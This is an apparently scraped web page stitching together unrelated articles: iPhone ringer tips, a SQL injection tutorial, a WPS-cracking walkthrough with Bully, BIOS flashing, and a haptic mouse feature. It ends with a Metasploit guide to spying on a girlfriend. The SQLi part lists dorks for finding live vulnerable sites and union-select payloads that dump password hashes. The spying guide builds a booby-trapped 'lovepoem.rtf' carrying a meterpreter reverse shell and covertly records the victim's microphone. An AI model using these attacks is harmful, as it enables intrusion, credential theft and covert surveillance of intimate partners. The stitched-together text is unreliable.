It can be a puzzling situation: you’re getting voicemails and
missing calls, but your iPhone doesn’t ring. It may seem mysterious, or
maybe just really annoying, but either way, it needs to be fixed.
There's not one single possible cause for why an iPhone stops ringing—it
could be because your phone is broken, but there are a lot of things to
try before concluding that—but the fixes are all relatively easy. If
you're not hearing your iPhone's ringer, there could be 5 culprits:
A broken speaker
Mute is turned on
Do Not Disturb is turned on
You've blocked the phone number
A problem with your ringtone.
Does Your Speaker Work?
The speaker at the bottom of your iPhone is used for every sounds
your phone makes. Whether that's playing music and games, watching
movies, or hearing a ringtone for incoming calls, the speaker is what
makes it all happen. If you're not hearing calls, it could be that your
speaker is broken. Try playing some music or a YouTube video,
and make sure to turn up the volume. If your hear audio fine, then
that's not the problem. But if no sound comes out when it should, and
you've got the volume up loud, it could be that you need to repair your
iPhone's speaker.
Another boring day and decided to check-out Null-Byte for some cool
tut's. Found none today, So tried searching old threads and found SQL
Injection Tutorials but to my surprise: There wasn't a tutorial about
Error Based, Normal, Time and others, i mean the basic SQL Injection
types we all find around everyday.The ones i found were half though ..
Today, I will like to spend my boring day writing a tutorial about SQLi Error Based. SQLi { SQL Injection }
SQLi
is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker). SQL
injection must exploit a security vulnerability in an application's
software, for example, when user input is either incorrectly filtered
for string literal escape characters embedded in SQL statements or user
input is not strongly typed and unexpectedly executed. SQL injection is
mostly known as an attack vector for websites but can be used to attack
any type of SQL database.
Imagine dropping an SQL Command to a database to do what you want: Select, Insert, Update, and my best friend Drop. Let's Take an unfiltered application that queries a database with the preferred user input. Statement: SELECT FROM `users` WHERE `username` = 'sky'
'sky' is the user suplied data. Should a user like me type:
> sky';DROP TABLE users > sky' or '1'='1
Please Don't Try This Queries on People's Work, Otherwise your gonna cause a great data loss to the owner Query1: Will drop the table name meaning: Empty the whole table data
Query2:
Will select all the data in the database, Could be credit card details :
You could cause great data breach since i don't think you would report
if you found Obama's credit card details in the application's database.
Although one or two people will report. Ok Lets Get Practical. How do you know when you need Error Based SQLi This is the most important part of web hacking; the type of injection to use in different situations. You can use Error Based Injections in the following errors you get:
> Unknown column in 'order clause' > The used SELECT statements have a different number of columns > You have an error in your SQL syntax; check the manual ... > Warning: ....
There are others but this is what one usually finds the most .... Now take note of these errors. You'll be needing them SQLi - Error Based Let's start by finding some vulnerable sites. There are many vulnerable sites so hope you find a nice and good one. You can search vulnerable sites through vulnerable dorks: trainers.php?id= playold.php?id= declarationmore.php?declid= Pageid= games.php?id= newsDetail.php?id= staffid= historialeer.php?num= product-item.php?id= newsview.php?id= humor.php?id= communiquedetail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id=
You can get more here
Open Google:
Type: inurl: followed by our dork:
inurl:game.php?id=
Now when you re presented with the search results: Take your time and visit each site carefully
To check if a site is vulnerable: apppend an apostophe ( ' )
If you find the errors i specified above then we are good to go otherwise try another site: Come back when you find one.
We will need our vulnerable column number here ... Above we got 4 i.e 1,2,3,4--
Now we need to find the injectable columns ...
To do that, site url followed by union select function and the vulnerable columns and also followed by our two hyphens (--) ...
> http://vulnerablesite.com/buy.php?id=5 union select columns --
Full URL: http://vulnerablesite.com/buy.php?id=5 union select 1,2,3,4--
After
doing executing the url .... We will need to study the page to find the
numbers that appear because they are our only gateway to inject
commands to the database ... Study the image : Normal and After Query
From the study of the page: After Query ... Result: 2,3,4
Injectable Columns are 2,3,4
Getting Database Name; Database Version; Current Database User
Database Name
Now from the above injectable columns 2,3,4 .... We could replace any one of the them with our query ... We will choose 2
To get the database name: Replace the preferred injectable column with database() ...
Study: Before we execute the query ... Append an hyphen before our id parameter and continue with the query id=-5
In this post, We have Vulnerable Columns { 1,2,3,4 } and Injectable Columns { 2,3,4 } .... You need to take note of this parameters ..Since we choose 2 as our preferred injectable column number .... This is how the query is gonna be ...
> http://site.com/buy.php?id=-5 union select 1,database(),3,4-- Notice We replaced our preferred injectable column 2 with the query database()
> http://vulnerablesite.com/buy.php?id=-5 union select 1,database(),3,4-- Note Our preferred injectable column number will be replaced with the database output ...
Result: btslab
My
Results will be different from yours since am using my localhost not a
real website so don't be like .... Your not doing the right thing ... DataBase Version Very simple: Just Replace database() with @@version
Result: 5.6.20
Current Database User Same applies to database user Just replace @@version with user()
Result: root@localhost
Getting Current Table In Database { BTSLAB }
Replace paramater with and 1=2 union select 1,2,group_concat(tablename) from information_schema.tables where table_schema=database()--
Full URL: http://target.com/buy.php?id=-5 and 1=2 union select 1,2,group_concat(tablename) from information_schema.tables where table_schema=database()--
Result: posts,users
Getting Columns From Table
I don't know about you but : I won't go for table:posts whiles I have seen table:users .......... "Hell Yeah .... Getting Table: users"
:Using Table - users
'Warning: You will need to convert the table name to MYSQL Char
Download HackBar Click On Drop-down Menu: SQL and Click On Mysql .... Another drop-down appears and Choose MySQL Char()
After
choosing MySQL Char() .. A javascript application dialog will pop up
and prompt us for our text to be converted .... We type our preferred
table name ... user
After Clicking Ok .... The text converted can be found in the addon's work bar ...
Now user==> CHAR(117, 115,101, 114, 115) Done
Let's continue our query ..
Replace parameter with and 1=2 union select 1,group_concat(columnname),3,4 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
Note: table name: users have been converted ..
Full URL: http://target.com/buy.php?id=-5 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
Result: ID,username,email,password,about,privilege,avatar,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
Getting Column Data of a selected Column name
Still don't know about you but am gonna go for column data: username and password
Replace parameter with and 1=2 union select 1,2,group_concat(username,0x3a,password) from users--
Full URL: http://target.com/buy.php?id=-5 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users--
Result: sky:bbc206c3aeebe3ed00cd14ec6e7f862c
What You Do With The Data Is Not My Part
Now you can try cracking the hash with online services ... I created one sometime ago ... You can go to my service here
Have A Nice Day !!! .... And please be kind to report if you find any vulnerability with my website ... Sorry for bad english and long article ... WANTED TO EXPRESS MY SELF ... My Waist again .. Catch you later guys ... Please correct me if i mistyped or made a wrong move ...
And and .... the last thing i don't wanna miss otherwise get my butts to jail .... This Tutorial is for Educational Purposes. Thank you.
Welcome back, to Grown tz hackers!
Like anything in
life, there are multiple ways of getting a hack done. In fact, good
hackers usually have many tricks up their sleeve to hack into a system.
If they didn't, they would not usually be successful. No hack works on
every system and no hack works all of the time.
I have demonstrated many ways to hack Wi-Fi here on Null Byte, including cracking WEP and WPA2 passwords and creating an Evil Twin and Rogue AP.
A few years back, Alex Long demonstrated how to use Reaver
to hack the WPS PIN on those systems with old firmware and WPS enabled.
Recently, a new WPS-hacking tool has appeared on the market and is
included in our Kali hacking distribution. It's name, appropriately, is Bully.
Why WPS Is So Vulnerable
WPS stands
for Wi-Fi Protected Setup and was designed to make setting a secure AP
simpler for the average homeowner. First introduced in 2006, by 2011 it
was discovered that it had a serious design flaw. The WPS PIN could be
brute-forced rather simply.
With only 7 unknown digits in the PIN,
there are just 9,999,999 possibilities, and most systems can attempt
that many combinations in a few hours. Once the WPS PIN is discovered,
the user can use that PIN to find the WPA2 preshared key (password).
Since a brute-force attack against a WPA2 protected AP can take hours to
days, if this feature is enabled on the AP and not upgraded, it can be a
much faster route to getting the PSK.
The Keys to Success
It's important to
note, though, that new APs no longer have this vulnerability. This
attack will only work on APs sold during that window of 2006 and early
2012. Since many families keep their APs for many years, there are still
many of these vulnerable ones around.
If you aren't familiar with wireless hacking, I strongly suggest that you read my introduction on the Aircrack-ng suite of tools. In addition, make certain that you have an Aircrack-ng compatible wireless card, otherwise this will simply be an exercise in frustration.
Step 1: Fire Up Kali
Let's start by firing our favorite hacking Linux distribution, Kali. Then open a terminal that looks like this:
To make certain we have some wireless connections and their designation, we can type:
kali > iwconfig
As we can see, this system has a wireless connection designated wlan0. Yours may be different, so make certain to check.
Step 2: Put Your Wi-Fi Adapter in Monitor Mode
The
next step is to put your Wi-Fi adapter in monitor mode. This is similar
to promiscuous mode on a wired connection. In other words, it enables
us to see all the packets passing through the air past our wireless
adapter. We can use one of the tools from the Aircrack-ng suite,
Airmon-ng, to accomplish this task.
kali > airmon-ng start wlan0
Next, we need to use Airdump-ng to see the info on the wireless AP around us.
kali > airdump-ng mon0
As
you can see, there are several APs visible to us. I'm interested in the
first one: "Mandela2." We will need its BSSID (MAC address), its
channel, and its SSID to be able to crack its WPS PIN.
Step 3: Use Airdump-Ng to Get the Necessary Info
Finally, all we need to do is to put this info into our Bully command.
kali > bully mon0 -b 00:25:9C:97:4F:48 -e Mandela2 -c 9
Let's break down that command to see what's happening.
mon0 is the name of the wireless adapter in monitor mode.
--b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
-e Mandela2 is the SSID of the AP.
-c 9 is the channel the AP is broadcasting on.
All of this information is available in the screen above with Airdump-ng.
Step 4: Start Bully
When we hit enter, Bully will start to try to crack the WPS PIN.
Now, if this AP is vulnerable to this attack, bully will spit out the WPS PIN and the AP password within 3 to 5 hours.
Your BIOS, or Basic Input Output System,
is the firmware on your motherboard responsible for initializing your
computer's hardware when it is first powered on. It probes for video
adapters, RAM, the whole works. The BIOS provides a small library
of basic input/output functions used to operate and control the
peripherals such as the keyboard, text display functions and so forth,
and these software library functions are callable by external software
such as the OS and system software within said OS.
When you enter your BIOS,
the BIOS settings allow us to manipulate devices in the computer to do
some pretty cool things. We can overclock parts, create RAID arrays, add
boot passwords and much more. By default, most manufacturers don't
allow you to have many settings, especially if you're a laptop user
(gaming laptop users excluded). This can really be a bummer, especially
when you're really close to running a game perfectly and your hardware
can't handle it, overclocking can be that final boost that you need.
Even if overclocking isn't your thing, you can downclock to save power.
Having a great BIOS allows users to do great things, but as we've said, a lot of computers lack this. The Null Byte alternative is to hack it! If we hack our BIOS, we can give our computer features it may not have even had before, like USB booting. Note that not all BIOS have hacked versions available.
Requirements
Windows OS
Know your BIOS name and version or computer model
Warning
You may brick your
computer's motherboard if you flash incorrectly or an error occurs,
rendering it unusable. Don't turn your computer off, or do anything else
during a flash.
Step 1 Find the Right Hacked BIOS for You
To find our BIOS, take the name of it and use relevant queries. I'll be looking for a hacked A05 BIOS for an Alienware M18x.
Head to Bios Mods. If you can't find it here, do a simple Google search. I used "hacked m18x bios a05" , which returned a lovely unlocked A05 BIOS.
Search for your BIOS, computer model, or both.
Step 2 Flash the BIOS
Turn
off all of the running software that you can. Having software running
can cause a bad flash, which will brick your motherboard.
Extract the utility archive.
Load up the tool and pick your cracked BIOS version if necessary.
Wait for the flash to complete.
When you reboot, you should have a BIOS with a plethora of new options like the example below.
ou've seen the felt mouse, which made computer clicking comfortable and chic, now brace yourself for something a little more interactive—DataBot.DataBot hails from the clever minds of Jan Barth and Roman Grasy,
two Interaction Design students based in Germany who wanted to create
an entirely different way to understand computer data, other than visual
representations. Instead of just looking at your files and folders,
their DataBot Mouse assigns physical properties to the data and
interacts with you through haptic technology—touching your senses.
Developed with Arduino and VVVV, the prototype consists of a small servo-motor inside an optical mouse, which brakes the little ball. It communicates three different data properties to the user.
It can show the weight of files and folders by braking with different
force, according to file size. You can set a custom weight for files
and folders so you can find important data more easily, just like the
color-marking function in Mac OS X. And you can see the activity of your
files and folders—showing how many times a file was opened or how busy a
folder has been recently—by "breathing" with different intervals.
All settings are customizable, so you can fit it to your individual needs.
And it doesn't stop with computer mice. They've also developed a family of DataBot Hard Drives. The basic construction of one of the hard drives consists of a 3D-printed case, a servo-motor and some red and blue LEDs.
The
hard drive grows or shrinks based on how much space is used, compared
to the total amount available. Just by looking at it, you can always see
its current fill level. During file transmissions, it visualizes the
progress with a blinking blue light, decreasing speed until the
transmission is complete. And if an error occurs, the hard drive will
shake and flash red lights.
Welcome back, my rookie hackers!
Now that nearly
everyone and everyplace has a computer, you can use those remote
computers for some good old "cloak and dagger" spying. No longer is
spying something that only the CIA, NSA, KGB, and other intelligence
agencies can do—you can learn to spy, too.
In this brand new series,
we will explore how we can use the ubiquity of the computer to peek in
on just about anyone and anyplace. Unlike the spy movies of yesteryear
where the spy had to place a listening device in the lamp or in a
houseplant, as long as there is a computer in the room, it can be used
as a "bug."
We will examine how to turn that commonplace computer
into our own bug to listen in on conversations, use as a spy camera,
track Internet searches, and more. James Bond and Q have nothing on us!
In
this first part, I will show you how to convert any computer, anywhere,
into a listening device. As nearly every room now has a computer in it,
you can put a bug in nearly every room, unnoticed and undetected.
Step 1: Fire Up Kali
The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.
Step 2: Compromise the Remote Computer
Probably the best way to compromise your target's computer is to use a carefully crafted email that will get the target to click on a document or link. Inside that document or link, we will embed a rootkit/listener that will enable us to turn on the built-in microphone on their computer and save any conversations in the room where it is located.
Since
we know the victim (it may be a girlfriend, neighbor, spouse, business
associate, foreign diplomat, foreign spy, etc.), we can can be very
specific in crafting an email that would gain their acceptance. The key,
of course, is to create document that sounds compelling, or at least
interesting, to get the victim to click on the Word document.
This becomes an exercise in social engineering
at this point. If the victim is a girlfriend/boyfriend, you might try
sending a love letter. If the victim is a business associate, it might
be Word or Excel document with a sales or other report. If it is a
neighbor, it may be a link to a community webpage.
I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.
Step 3: Find an Exploit
Now, if we want to exploit a Windows 7
system (most Windows 7 exploits will work on Windows 8), we will need
to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's
Word application.
This past spring, Microsoft revealed that
hackers had found a vulnerability in Microsoft Word and Office Web apps
that could allow remote code execution (read, rootkit). Here is
Microsoft's announcement on their Technet Security Bulletin below (more info on Technet can be found here).
As you can see, they have named it MS14-017. When we do a search in Metasploit for this vulnerability/exploit, we find: exploit/windows/fileformat/ms14_017_rtf
Now that we have found the proper exploit, let's load it into Metasploit by typing: msf >use exploit/windows/fileformat/ms14_017_rtf
Once we have it loaded, let's type "info" to find more about this exploit.
Now, "show options."
As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.
Step 4: Set the FILENAME
In this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf." set FILENAME lovepoem.rtf
Step 5: Set the Payload
Next, we need to set the payload to place in her "lovepoem." In this case, let's send the meterpreter as it gives us almost unlimited power and control over the hacked system. msf > set PAYLOAD windows/meterpreter/reverse_tcp
Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.
Finally,
simply type "exploit." This will create a Word file called "lovepoem"
that will place the meterpreter on her system that we can then connect
to.
Step 6: Open a Multi-Handler for the Connection
For the next step, we need to open a multi-handler to receive the connection back to our system. msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_tcp
And finally, set the LHOST to your IP.
Step 7: Send the Love Poem to Your Girfriend
Now
that we have created our malicious file, you need to send it to your
girlfriend. You likely will want to send it via an email attachment with
a note telling her that your wrote her a short poem to express your
love for her. Knowing that it is from you, I'm sure she will click on it
as she loves you dearly and trusts you completely.
Step 8: Compromise Her System
When she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.
Step 9: Record with the Microphone
What we will
do next is enable the microphone on her computer and begin to record all
of the sounds within earshot of it. Metasploit has a Ruby script that
will enable the microphone on the target machine and begin to record all
sounds and conversations nearby. If we go to our ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.
From the meterpreter prompt, simply type: meterpreter > run sound_recorder - l /root
This will start the microphone on her computer and store the recorded conversations and sounds in a file in the /root
directory on your system. Of course, you can choose any directory to
store these recordings. Just make certain you have adequate hard drive
space, as these files can become very large. When you want to hear what
was recorded, simply open the stored file on your system.
Stay Tuned for More Spying Fun...
No
longer is spying the exclusive province of the CIA, NSA, KGB, or MI5.
With just a little computer skills, anyone can be a spy. In future tutorials, I will show you how to turn on webcams, take screenshots, download confidential files from anyone's computer, and more.
